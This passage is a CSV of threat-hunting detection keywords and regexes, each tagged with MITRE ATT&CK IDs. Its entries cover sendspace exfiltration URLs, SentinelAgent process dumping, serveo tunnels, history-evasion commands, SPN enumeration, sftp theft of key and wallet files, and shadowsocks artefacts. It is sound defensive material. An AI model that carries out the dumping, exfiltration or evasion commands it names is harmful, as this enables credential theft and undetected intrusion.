https://www.sendspace.com/file/*",".{0,1000}\shttps\:\/\/www\.sendspace\.com\/file\/.{0,1000}","greyware_tool_keyword","sendspace.com","Interesting observation on the file-sharing platform preferences derived from the negotiations chats with LockBit victims","T1567 - T1022 - T1074 - T1105","TA0011 - TA0009 - TA0010 - TA0008","N/A","Hive","Collection","https://twitter.com/mthcht/status/1660953897622544384","1","1","N/A","greyware tool - risks of False positive 
!","10","10","N/A","N/A","N/A","N/A" "*https://*.sendspace.com/upload*",".{0,1000}https\:\/\/.{0,1000}\.sendspace\.com\/upload.{0,1000}","greyware_tool_keyword","sendspace.com","Interesting observation on the file-sharing platform preferences derived from the negotiations chats with LockBit victims","T1567 - T1022 - T1074 - T1105","TA0011 - TA0009 - TA0010 - TA0008","N/A","Hive","Data Exfiltration","https://twitter.com/mthcht/status/1660953897622544384","1","1","N/A","greyware tool - risks of False positive !","10","10","N/A","N/A","N/A","N/A" "* DumpS1.ps1*",".{0,1000}\sDumpS1\.ps1.{0,1000}","greyware_tool_keyword","SentinelAgent","dump a process with SentinelAgent.exe","T1003 - T1055","TA0006 - TA0005","N/A","N/A","Credential Access","https://gist.github.com/adamsvoboda/8e248c6b7fb812af5d04daba141c867e","1","0","N/A","N/A","8","7","N/A","N/A","N/A","N/A" "*/DumpS1.ps1*",".{0,1000}\/DumpS1\.ps1.{0,1000}","greyware_tool_keyword","SentinelAgent","dump a process with SentinelAgent.exe","T1003 - T1055","TA0006 - TA0005","N/A","N/A","Credential Access","https://gist.github.com/adamsvoboda/8e248c6b7fb812af5d04daba141c867e","1","0","N/A","N/A","8","7","N/A","N/A","N/A","N/A" "*\DumpS1.ps1*",".{0,1000}\\DumpS1\.ps1.{0,1000}","greyware_tool_keyword","SentinelAgent","dump a process with SentinelAgent.exe","T1003 - T1055","TA0006 - TA0005","N/A","N/A","Credential Access","https://gist.github.com/adamsvoboda/8e248c6b7fb812af5d04daba141c867e","1","0","N/A","N/A","8","7","N/A","N/A","N/A","N/A" "*\temp\__SentinelAgentKernel.dmp*",".{0,1000}\\temp\\__SentinelAgentKernel\.dmp.{0,1000}","greyware_tool_keyword","SentinelAgent","dump a process with SentinelAgent.exe","T1003 - T1055","TA0006 - TA0005","N/A","N/A","Credential Access","https://gist.github.com/adamsvoboda/8e248c6b7fb812af5d04daba141c867e","1","0","N/A","N/A","8","7","N/A","N/A","N/A","N/A" "*\temp\__SentinelAgentUser.dmp*",".{0,1000}\\temp\\__SentinelAgentUser\.dmp.{0,1000}","greyware_tool_keyword","SentinelAgent","dump 
a process with SentinelAgent.exe","T1003 - T1055","TA0006 - TA0005","N/A","N/A","Credential Access","https://gist.github.com/adamsvoboda/8e248c6b7fb812af5d04daba141c867e","1","0","N/A","N/A","8","7","N/A","N/A","N/A","N/A" "*DumpProcessPid -targetPID * -outputFile*",".{0,1000}DumpProcessPid\s\-targetPID\s.{0,1000}\s\-outputFile.{0,1000}","greyware_tool_keyword","SentinelAgent","dump a process with SentinelAgent.exe","T1003 - T1055","TA0006 - TA0005","N/A","N/A","Credential Access","https://gist.github.com/adamsvoboda/8e248c6b7fb812af5d04daba141c867e","1","0","N/A","N/A","8","7","N/A","N/A","N/A","N/A" "*TakeDump -SentinelHelper * -ProcessId * -User * -Kernel *",".{0,1000}TakeDump\s\-SentinelHelper\s.{0,1000}\s\-ProcessId\s.{0,1000}\s\-User\s.{0,1000}\s\-Kernel\s.{0,1000}","greyware_tool_keyword","SentinelAgent","dump a process with SentinelAgent.exe","T1003 - T1055","TA0006 - TA0005","N/A","N/A","Credential Access","https://gist.github.com/adamsvoboda/8e248c6b7fb812af5d04daba141c867e","1","0","N/A","N/A","8","7","N/A","N/A","N/A","N/A" "*Trying to dump SentinelAgent to *",".{0,1000}Trying\sto\sdump\sSentinelAgent\sto\s.{0,1000}","greyware_tool_keyword","SentinelAgent","dump a process with SentinelAgent.exe","T1003 - T1055","TA0006 - TA0005","N/A","N/A","Credential Access","https://gist.github.com/adamsvoboda/8e248c6b7fb812af5d04daba141c867e","1","0","N/A","N/A","8","7","N/A","N/A","N/A","N/A" "*http://*.serveo.net*",".{0,1000}http\:\/\/.{0,1000}\.serveo\.net.{0,1000}","greyware_tool_keyword","serveo.net","Expose local servers to the internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://serveo.net","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*https://*.serveo.net*",".{0,1000}https\:\/\/.{0,1000}\.serveo\.net.{0,1000}","greyware_tool_keyword","serveo.net","Expose local servers to the internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://serveo.net","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" 
"*cmd /c set /A 1^^0*",".{0,1000}cmd\s\/c\sset\s\/A\s1\^\^0.{0,1000}","greyware_tool_keyword","set","Bitwise XOR Operation in commandline observed in a malware sample","T1059.003 - T1480.001","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://tria.ge/240617-mn75pa1cnl/behavioral2/analog?proc=87","1","0","N/A","N/A","8","10","N/A","N/A","N/A","N/A" "*cmd.exe /c set /A 1^^0*",".{0,1000}cmd\.exe\s\/c\sset\s\/A\s1\^\^0.{0,1000}","greyware_tool_keyword","set","Bitwise XOR Operation in commandline observed in a malware sample","T1059.003 - T1480.001","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://tria.ge/240617-mn75pa1cnl/behavioral2/analog?proc=87","1","0","N/A","N/A","8","10","N/A","N/A","N/A","N/A" "*cmd.exe*/c set /A 1^^0*",".{0,1000}cmd\.exe.{0,1000}\/c\sset\s\/A\s1\^\^0.{0,1000}","greyware_tool_keyword","set","Bitwise XOR Operation in commandline observed in a malware sample","T1059.003 - T1480.001","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://tria.ge/240617-mn75pa1cnl/behavioral2/analog?proc=87","1","0","N/A","N/A","8","10","N/A","N/A","N/A","N/A" "*set +o history*",".{0,1000}set\s\+o\shistory.{0,1000}","greyware_tool_keyword","set","Does not write any of the current session to the history log","T1070.006","TA0005","N/A","N/A","Defense Evasion","N/A","1","0","N/A","greyware tool - risks of False positive !","10","10","N/A","N/A","N/A","N/A" "*/SetACL.exe*",".{0,1000}\/SetACL\.exe.{0,1000}","greyware_tool_keyword","SetACL","Manage Windows permissions from the command line","T1069 - T1222","TA0002 - TA0004 - TA0005","N/A","N/A","Defense Evasion","https://helgeklein.com/download/","1","1","N/A","N/A","6","10","N/A","N/A","N/A","N/A" "*/SetACL64..exe*",".{0,1000}\/SetACL64\.\.exe.{0,1000}","greyware_tool_keyword","SetACL","Manage Windows permissions from the command line","T1069 - T1222","TA0002 - TA0004 - TA0005","N/A","N/A","Defense Evasion","https://helgeklein.com/download/","1","1","N/A","N/A","6","10","N/A","N/A","N/A","N/A" 
"*\SetACL.exe*",".{0,1000}\\SetACL\.exe.{0,1000}","greyware_tool_keyword","SetACL","Manage Windows permissions from the command line","T1069 - T1222","TA0002 - TA0004 - TA0005","N/A","N/A","Defense Evasion","https://helgeklein.com/download/","1","0","N/A","N/A","6","10","N/A","N/A","N/A","N/A" "*\SetACL64.exe*",".{0,1000}\\SetACL64\.exe.{0,1000}","greyware_tool_keyword","SetACL","Manage Windows permissions from the command line","T1069 - T1222","TA0002 - TA0004 - TA0005","N/A","N/A","Defense Evasion","https://helgeklein.com/download/","1","0","N/A","N/A","6","10","N/A","N/A","N/A","N/A" "*>SetACL.exe<*",".{0,1000}\>SetACL\.exe\<.{0,1000}","greyware_tool_keyword","SetACL","Manage Windows permissions from the command line","T1069 - T1222","TA0002 - TA0004 - TA0005","N/A","N/A","Defense Evasion","https://helgeklein.com/download/","1","0","N/A","N/A","6","10","N/A","N/A","N/A","N/A" "*>SetACL64..exe<*",".{0,1000}\>SetACL64\.\.exe\<.{0,1000}","greyware_tool_keyword","SetACL","Manage Windows permissions from the command line","T1069 - T1222","TA0002 - TA0004 - TA0005","N/A","N/A","Defense Evasion","https://helgeklein.com/download/","1","0","N/A","N/A","6","10","N/A","N/A","N/A","N/A" "*setspn.exe -F -Q */*",".{0,1000}setspn\.exe\s\-F\s\-Q\s.{0,1000}\/.{0,1000}","greyware_tool_keyword","setspn","Getting users with SPNs","T1003 - T1558.003","TA0007","N/A","N/A","Discovery","https://github.com/b401/Wiki/blob/main/Security/Windows/AD/enumeration.md?plain=1","1","0","N/A","N/A","7","1","0","0","2023-10-24T20:31:01Z","2022-11-12T17:18:05Z" "*setspn.exe* -T *-Q cifs/*",".{0,1000}setspn\.exe.{0,1000}\s\-T\s.{0,1000}\-Q\scifs\/.{0,1000}","greyware_tool_keyword","setspn","Getting users with SPNs","T1003 - T1558.003","TA0007","N/A","N/A","Discovery","https://thedfirreport.com/2024/04/29/from-icedid-to-dagon-locker-ransomware-in-29-days/","1","0","N/A","N/A","7","10","N/A","N/A","N/A","N/A" 
"*oofgbpoabipfcfjapgnbbjjaenockbdp*",".{0,1000}oofgbpoabipfcfjapgnbbjjaenockbdp.{0,1000}","greyware_tool_keyword","SetupVPN","External VPN usage within corporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","N/A","detection in registry","8","10","N/A","N/A","N/A","N/A" "*/sftp *@*:* ",".{0,1000}/sftp\s.{0,1000}\@.{0,1000}\:.{0,1000}","greyware_tool_keyword","sftp","Detects the use of tools that copy files from or to remote systems","T1041 - T1105 - T1106","TA0002 - TA0008 - TA0010","N/A","N/A","Data Exfiltration","https://attack.mitre.org/techniques/T1105/","1","0","N/A","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" "*/sftp *get*.wallet*",".{0,1000}sftp.*get.*(\.pem|\.key|\.wallet)\b.{0,1000}","greyware_tool_keyword","sftp","sftp transfers of sensitive files","T1041 - T1105 - T1106","TA0002 - TA0008 - TA0010","N/A","N/A","Data Exfiltration","https://attack.mitre.org/techniques/T1105/","1","0","N/A","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" "*/sftp *put*.tar.gz*",".{0,1000}sftp\s.*put.*(\.tar\.gz|\.zip|\.rar|\.7z)\b.{0,1000}","greyware_tool_keyword","sftp","sftp archive transfers","T1041 - T1105 - T1106","TA0002 - TA0008 - TA0010","N/A","N/A","Data Exfiltration","https://attack.mitre.org/techniques/T1105/","1","0","N/A","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" "* install shadowsocks-rust*",".{0,1000}\sinstall\sshadowsocks\-rust.{0,1000}","greyware_tool_keyword","shadowsocks","Rust port - shadowsocks is a fast tunnel proxy that helps you bypass firewalls","T1572 - T1090","TA0011 - 
TA0005","N/A","N/A","C2","https://github.com/shadowsocks/shadowsocks-rust","1","0","N/A","N/A","10","10","8272","1135","2024-08-27T02:27:32Z","2014-10-15T11:02:36Z" "* privoxy.exe*",".{0,1000}\sprivoxy\.exe.{0,1000}","greyware_tool_keyword","shadowsocks","shadowsocks is a fast tunnel proxy that helps you bypass firewalls","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/shadowsocks/shadowsocks-windows","1","0","N/A","N/A","10","10","58239","16401","2024-08-20T09:02:57Z","2013-01-14T07:54:16Z" "* shadowsocks-divert*",".{0,1000}\sshadowsocks\-divert.{0,1000}","greyware_tool_keyword","shadowsocks","Rust port - shadowsocks is a fast tunnel proxy that helps you bypass firewalls","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/shadowsocks/shadowsocks-rust","1","0","N/A","N/A","10","10","8272","1135","2024-08-27T02:27:32Z","2014-10-15T11:02:36Z" "* shadowsocks-rust.sslocal-daemon*",".{0,1000}\sshadowsocks\-rust\.sslocal\-daemon.{0,1000}","greyware_tool_keyword","shadowsocks","Rust port - shadowsocks is a fast tunnel proxy that helps you bypass firewalls","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/shadowsocks/shadowsocks-rust","1","0","N/A","N/A","10","10","8272","1135","2024-08-27T02:27:32Z","2014-10-15T11:02:36Z" "* shadowsocks-tproxy-mark*",".{0,1000}\sshadowsocks\-tproxy\-mark.{0,1000}","greyware_tool_keyword","shadowsocks","Rust port - shadowsocks is a fast tunnel proxy that helps you bypass firewalls","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/shadowsocks/shadowsocks-rust","1","0","N/A","N/A","10","10","8272","1135","2024-08-27T02:27:32Z","2014-10-15T11:02:36Z" "*/etc/capabilities/shadowsocks.json*",".{0,1000}\/etc\/capabilities\/shadowsocks\.json.{0,1000}","greyware_tool_keyword","shadowsocks","Rust port - shadowsocks is a fast tunnel proxy that helps you bypass firewalls","T1572 - T1090","TA0011 - 
TA0005","N/A","N/A","C2","https://github.com/shadowsocks/shadowsocks-rust","1","0","N/A","N/A","10","10","8272","1135","2024-08-27T02:27:32Z","2014-10-15T11:02:36Z" "*/etc/shadowsocks-rust*",".{0,1000}\/etc\/shadowsocks\-rust.{0,1000}","greyware_tool_keyword","shadowsocks","Rust port - shadowsocks is a fast tunnel proxy that helps you bypass firewalls","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/shadowsocks/shadowsocks-rust","1","0","N/A","N/A","10","10","8272","1135","2024-08-27T02:27:32Z","2014-10-15T11:02:36Z" "*/genacl_proxy_gfw_bypass_china_ip.py",".{0,1000}\/genacl_proxy_gfw_bypass_china_ip\.py","greyware_tool_keyword","shadowsocks","Rust port - shadowsocks is a fast tunnel proxy that helps you bypass firewalls","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/shadowsocks/shadowsocks-rust","1","0","N/A","N/A","10","10","8272","1135","2024-08-27T02:27:32Z","2014-10-15T11:02:36Z" "*/privoxy.exe*",".{0,1000}\/privoxy\.exe.{0,1000}","greyware_tool_keyword","shadowsocks","shadowsocks is a fast tunnel proxy that helps you bypass firewalls","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/shadowsocks/shadowsocks-windows","1","1","N/A","N/A","10","10","58239","16401","2024-08-20T09:02:57Z","2013-01-14T07:54:16Z" "*/Shadowsocks-*.zip*",".{0,1000}\/Shadowsocks\-.{0,1000}\.zip.{0,1000}","greyware_tool_keyword","shadowsocks","shadowsocks is a fast tunnel proxy that helps you bypass firewalls","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/shadowsocks/shadowsocks-windows","1","1","N/A","N/A","10","10","58239","16401","2024-08-20T09:02:57Z","2013-01-14T07:54:16Z" "*/Shadowsocks.zip*",".{0,1000}\/Shadowsocks\.zip.{0,1000}","greyware_tool_keyword","shadowsocks","shadowsocks is a fast tunnel proxy that helps you bypass firewalls","T1572 - T1090","TA0011 - 
TA0005","N/A","N/A","C2","https://github.com/shadowsocks/shadowsocks-windows","1","1","N/A","N/A","10","10","58239","16401","2024-08-20T09:02:57Z","2013-01-14T07:54:16Z" "*/shadowsocks_service.*",".{0,1000}\/shadowsocks_service\..{0,1000}","greyware_tool_keyword","shadowsocks","Rust port - shadowsocks is a fast tunnel proxy that helps you bypass firewalls","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/shadowsocks/shadowsocks-rust","1","0","N/A","N/A","10","10","8272","1135","2024-08-27T02:27:32Z","2014-10-15T11:02:36Z" "*/shadowsocks-manager.sock*",".{0,1000}\/shadowsocks\-manager\.sock.{0,1000}","greyware_tool_keyword","shadowsocks","Rust port - shadowsocks is a fast tunnel proxy that helps you bypass firewalls","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/shadowsocks/shadowsocks-rust","1","0","N/A","N/A","10","10","8272","1135","2024-08-27T02:27:32Z","2014-10-15T11:02:36Z" "*/shadowsocks-rust.default*",".{0,1000}\/shadowsocks\-rust\.default.{0,1000}","greyware_tool_keyword","shadowsocks","Rust port - shadowsocks is a fast tunnel proxy that helps you bypass firewalls","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/shadowsocks/shadowsocks-rust","1","1","N/A","N/A","10","10","8272","1135","2024-08-27T02:27:32Z","2014-10-15T11:02:36Z" "*/shadowsocks-rust.git*",".{0,1000}\/shadowsocks\-rust\.git.{0,1000}","greyware_tool_keyword","shadowsocks","Rust port - shadowsocks is a fast tunnel proxy that helps you bypass firewalls","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/shadowsocks/shadowsocks-rust","1","1","N/A","N/A","10","10","8272","1135","2024-08-27T02:27:32Z","2014-10-15T11:02:36Z" "*/shadowsocks-rust.init*",".{0,1000}\/shadowsocks\-rust\.init.{0,1000}","greyware_tool_keyword","shadowsocks","Rust port - shadowsocks is a fast tunnel proxy that helps you bypass firewalls","T1572 - T1090","TA0011 - 
TA0005","N/A","N/A","C2","https://github.com/shadowsocks/shadowsocks-rust","1","1","N/A","N/A","10","10","8272","1135","2024-08-27T02:27:32Z","2014-10-15T11:02:36Z" "*/shadowsocks-rust.service*",".{0,1000}\/shadowsocks\-rust\.service.{0,1000}","greyware_tool_keyword","shadowsocks","Rust port - shadowsocks is a fast tunnel proxy that helps you bypass firewalls","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/shadowsocks/shadowsocks-rust","1","1","N/A","N/A","10","10","8272","1135","2024-08-27T02:27:32Z","2014-10-15T11:02:36Z" "*/shadowsocks-service*",".{0,1000}\/shadowsocks\-service.{0,1000}","greyware_tool_keyword","shadowsocks","Rust port - shadowsocks is a fast tunnel proxy that helps you bypass firewalls","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/shadowsocks/shadowsocks-rust","1","1","N/A","N/A","10","10","8272","1135","2024-08-27T02:27:32Z","2014-10-15T11:02:36Z" "*/shadowsocks-windows.git*",".{0,1000}\/shadowsocks\-windows\.git.{0,1000}","greyware_tool_keyword","shadowsocks","shadowsocks is a fast tunnel proxy that helps you bypass firewalls","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/shadowsocks/shadowsocks-windows","1","1","N/A","N/A","10","10","58239","16401","2024-08-20T09:02:57Z","2013-01-14T07:54:16Z" "*/usr/local/etc/shadowsocks6.json*",".{0,1000}\/usr\/local\/etc\/shadowsocks6\.json.{0,1000}","greyware_tool_keyword","shadowsocks","Rust port - shadowsocks is a fast tunnel proxy that helps you bypass firewalls","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/shadowsocks/shadowsocks-rust","1","0","N/A","N/A","10","10","8272","1135","2024-08-27T02:27:32Z","2014-10-15T11:02:36Z" "*/var/log/shadowsocks*",".{0,1000}\/var\/log\/shadowsocks.{0,1000}","greyware_tool_keyword","shadowsocks","Rust port - shadowsocks is a fast tunnel proxy that helps you bypass firewalls","T1572 - T1090","TA0011 - 
TA0005","N/A","N/A","C2","https://github.com/shadowsocks/shadowsocks-rust","1","0","N/A","N/A","10","10","8272","1135","2024-08-27T02:27:32Z","2014-10-15T11:02:36Z" "*\genacl_proxy_gfw_bypass_china_ip.py",".{0,1000}\\genacl_proxy_gfw_bypass_china_ip\.py","greyware_tool_keyword","shadowsocks","Rust port - shadowsocks is a fast tunnel proxy that helps you bypass firewalls","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/shadowsocks/shadowsocks-rust","1","0","N/A","N/A","10","10","8272","1135","2024-08-27T02:27:32Z","2014-10-15T11:02:36Z" "*\privoxy.exe*",".{0,1000}\\privoxy\.exe.{0,1000}","greyware_tool_keyword","shadowsocks","shadowsocks is a fast tunnel proxy that helps you bypass firewalls","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/shadowsocks/shadowsocks-windows","1","0","N/A","N/A","10","10","58239","16401","2024-08-20T09:02:57Z","2013-01-14T07:54:16Z" "*\Shadowsocks-*.zip*",".{0,1000}\\Shadowsocks\-.{0,1000}\.zip.{0,1000}","greyware_tool_keyword","shadowsocks","shadowsocks is a fast tunnel proxy that helps you bypass firewalls","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/shadowsocks/shadowsocks-windows","1","0","N/A","N/A","10","10","58239","16401","2024-08-20T09:02:57Z","2013-01-14T07:54:16Z" "*\Shadowsocks.CLI\*",".{0,1000}\\Shadowsocks\.CLI\\.{0,1000}","greyware_tool_keyword","shadowsocks","shadowsocks is a fast tunnel proxy that helps you bypass firewalls","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/shadowsocks/shadowsocks-windows","1","0","N/A","N/A","10","10","58239","16401","2024-08-20T09:02:57Z","2013-01-14T07:54:16Z" "*\Shadowsocks.csproj*",".{0,1000}\\Shadowsocks\.csproj.{0,1000}","greyware_tool_keyword","shadowsocks","shadowsocks is a fast tunnel proxy that helps you bypass firewalls","T1572 - T1090","TA0011 - 
TA0005","N/A","N/A","C2","https://github.com/shadowsocks/shadowsocks-windows","1","0","N/A","N/A","10","10","58239","16401","2024-08-20T09:02:57Z","2013-01-14T07:54:16Z" "*\Shadowsocks.zip*",".{0,1000}\\Shadowsocks\.zip.{0,1000}","greyware_tool_keyword","shadowsocks","shadowsocks is a fast tunnel proxy that helps you bypass firewalls","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/shadowsocks/shadowsocks-windows","1","0","N/A","N/A","10","10","58239","16401","2024-08-20T09:02:57Z","2013-01-14T07:54:16Z" "*\shadowsocks-windows.sln*",".{0,1000}\\shadowsocks\-windows\.sln.{0,1000}","greyware_tool_keyword","shadowsocks","shadowsocks is a fast tunnel proxy that helps you bypass firewalls","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/shadowsocks/shadowsocks-windows","1","0","N/A","N/A","10","10","58239","16401","2024-08-20T09:02:57Z","2013-01-14T07:54:16Z" "*\ss_privoxy.log*",".{0,1000}\\ss_privoxy\.log.{0,1000}","greyware_tool_keyword","shadowsocks","shadowsocks is a fast tunnel proxy that helps you bypass firewalls","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/shadowsocks/shadowsocks-windows","1","0","N/A","N/A","10","10","58239","16401","2024-08-20T09:02:57Z","2013-01-14T07:54:16Z" "*__PRIVOXY_BIND_IP__*",".{0,1000}__PRIVOXY_BIND_IP__.{0,1000}","greyware_tool_keyword","shadowsocks","shadowsocks is a fast tunnel proxy that helps you bypass firewalls","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/shadowsocks/shadowsocks-windows","1","0","N/A","N/A","10","10","58239","16401","2024-08-20T09:02:57Z","2013-01-14T07:54:16Z" "*__PRIVOXY_BIND_PORT__*",".{0,1000}__PRIVOXY_BIND_PORT__.{0,1000}","greyware_tool_keyword","shadowsocks","shadowsocks is a fast tunnel proxy that helps you bypass firewalls","T1572 - T1090","TA0011 - 
TA0005","N/A","N/A","C2","https://github.com/shadowsocks/shadowsocks-windows","1","0","N/A","N/A","10","10","58239","16401","2024-08-20T09:02:57Z","2013-01-14T07:54:16Z" "*00833ecb01131c0c74ca39cfc0e0fe3549651df916dfc4d2c6d7aeda600784bc*",".{0,1000}00833ecb01131c0c74ca39cfc0e0fe3549651df916dfc4d2c6d7aeda600784bc.{0,1000}","greyware_tool_keyword","shadowsocks","shadowsocks is a fast tunnel proxy that helps you bypass firewalls","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/shadowsocks/shadowsocks-windows","1","0","#filehash","N/A","10","10","58239","16401","2024-08-20T09:02:57Z","2013-01-14T07:54:16Z" "*0472497b295c4466e58c2623f2f03281f4a8297696753dd18effe3a4d633e86e*",".{0,1000}0472497b295c4466e58c2623f2f03281f4a8297696753dd18effe3a4d633e86e.{0,1000}","greyware_tool_keyword","shadowsocks","shadowsocks is a fast tunnel proxy that helps you bypass firewalls","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/shadowsocks/shadowsocks-windows","1","0","#filehash","N/A","10","10","58239","16401","2024-08-20T09:02:57Z","2013-01-14T07:54:16Z" "*0eaa8e2763861316fdb41ba45636dbb78c1593714a0ed480573ff7efc5b34b7a*",".{0,1000}0eaa8e2763861316fdb41ba45636dbb78c1593714a0ed480573ff7efc5b34b7a.{0,1000}","greyware_tool_keyword","shadowsocks","shadowsocks is a fast tunnel proxy that helps you bypass firewalls","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/shadowsocks/shadowsocks-windows","1","0","#filehash","N/A","10","10","58239","16401","2024-08-20T09:02:57Z","2013-01-14T07:54:16Z" "*13141ae2c7cfeea1ffe619f76b569d4c52204298daf5b986ffd4693534581b1e*",".{0,1000}13141ae2c7cfeea1ffe619f76b569d4c52204298daf5b986ffd4693534581b1e.{0,1000}","greyware_tool_keyword","shadowsocks","shadowsocks is a fast tunnel proxy that helps you bypass firewalls","T1572 - T1090","TA0011 - 
TA0005","N/A","N/A","C2","https://github.com/shadowsocks/shadowsocks-windows","1","0","#filehash","N/A","10","10","58239","16401","2024-08-20T09:02:57Z","2013-01-14T07:54:16Z" "*14f0840dbabc554d43cf3021e04f7b11c7285bd85ee13dfb9d59c0a942bcd515*",".{0,1000}14f0840dbabc554d43cf3021e04f7b11c7285bd85ee13dfb9d59c0a942bcd515.{0,1000}","greyware_tool_keyword","shadowsocks","shadowsocks is a fast tunnel proxy that helps you bypass firewalls","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/shadowsocks/shadowsocks-windows","1","0","#filehash","N/A","10","10","58239","16401","2024-08-20T09:02:57Z","2013-01-14T07:54:16Z" "*1CC6E8A9-1875-430C-B2BB-F227ACD711B1*",".{0,1000}1CC6E8A9\-1875\-430C\-B2BB\-F227ACD711B1.{0,1000}","greyware_tool_keyword","shadowsocks","shadowsocks is a fast tunnel proxy that helps you bypass firewalls","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/shadowsocks/shadowsocks-windows","1","0","#GUIDproject","N/A","10","10","58239","16401","2024-08-20T09:02:57Z","2013-01-14T07:54:16Z" "*261755fa0c132c7719c4c5176bb2b5308a0176dc716fea898d3c63d60a21c521*",".{0,1000}261755fa0c132c7719c4c5176bb2b5308a0176dc716fea898d3c63d60a21c521.{0,1000}","greyware_tool_keyword","shadowsocks","shadowsocks is a fast tunnel proxy that helps you bypass firewalls","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/shadowsocks/shadowsocks-windows","1","0","#filehash","N/A","10","10","58239","16401","2024-08-20T09:02:57Z","2013-01-14T07:54:16Z" "*2654a13a86c8ac23149c8a173eed10965036445c50d53515d67a634b43e4ab87*",".{0,1000}2654a13a86c8ac23149c8a173eed10965036445c50d53515d67a634b43e4ab87.{0,1000}","greyware_tool_keyword","shadowsocks","shadowsocks is a fast tunnel proxy that helps you bypass firewalls","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/shadowsocks/shadowsocks-windows","1","0","#filehash","N/A","10","10","58239","16401","2024-08-20T09:02:57Z","2013-01-14T07:54:16Z" 
"*2731974930b30b2fce237f48911486b45dbd2d896d9ab3347051b0022a8bd424*",".{0,1000}2731974930b30b2fce237f48911486b45dbd2d896d9ab3347051b0022a8bd424.{0,1000}","greyware_tool_keyword","shadowsocks","Rust port - shadowsocks is a fast tunnel proxy that helps you bypass firewalls","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/shadowsocks/shadowsocks-rust","1","0","#filehash","N/A","10","10","8272","1135","2024-08-27T02:27:32Z","2014-10-15T11:02:36Z" "*276d3ecc4dcbd180a4ee953cd9721ced7ecf1309d332b05bf3d0f02bfb73bfee*",".{0,1000}276d3ecc4dcbd180a4ee953cd9721ced7ecf1309d332b05bf3d0f02bfb73bfee.{0,1000}","greyware_tool_keyword","shadowsocks","shadowsocks is a fast tunnel proxy that helps you bypass firewalls","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/shadowsocks/shadowsocks-windows","1","0","#filehash","N/A","10","10","58239","16401","2024-08-20T09:02:57Z","2013-01-14T07:54:16Z" "*2cc467b53348d1cafe2d329b96a48fdb54198fca6a6e1cf41b98df353f458e6f*",".{0,1000}2cc467b53348d1cafe2d329b96a48fdb54198fca6a6e1cf41b98df353f458e6f.{0,1000}","greyware_tool_keyword","shadowsocks","shadowsocks is a fast tunnel proxy that helps you bypass firewalls","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/shadowsocks/shadowsocks-windows","1","0","#filehash","N/A","10","10","58239","16401","2024-08-20T09:02:57Z","2013-01-14T07:54:16Z" "*3f2b33ff51dfa3351b72926fc97202f2681af4aa329b815e55100851b02b8896*",".{0,1000}3f2b33ff51dfa3351b72926fc97202f2681af4aa329b815e55100851b02b8896.{0,1000}","greyware_tool_keyword","shadowsocks","Rust port - shadowsocks is a fast tunnel proxy that helps you bypass firewalls","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/shadowsocks/shadowsocks-rust","1","0","#filehash","N/A","10","10","8272","1135","2024-08-27T02:27:32Z","2014-10-15T11:02:36Z" 
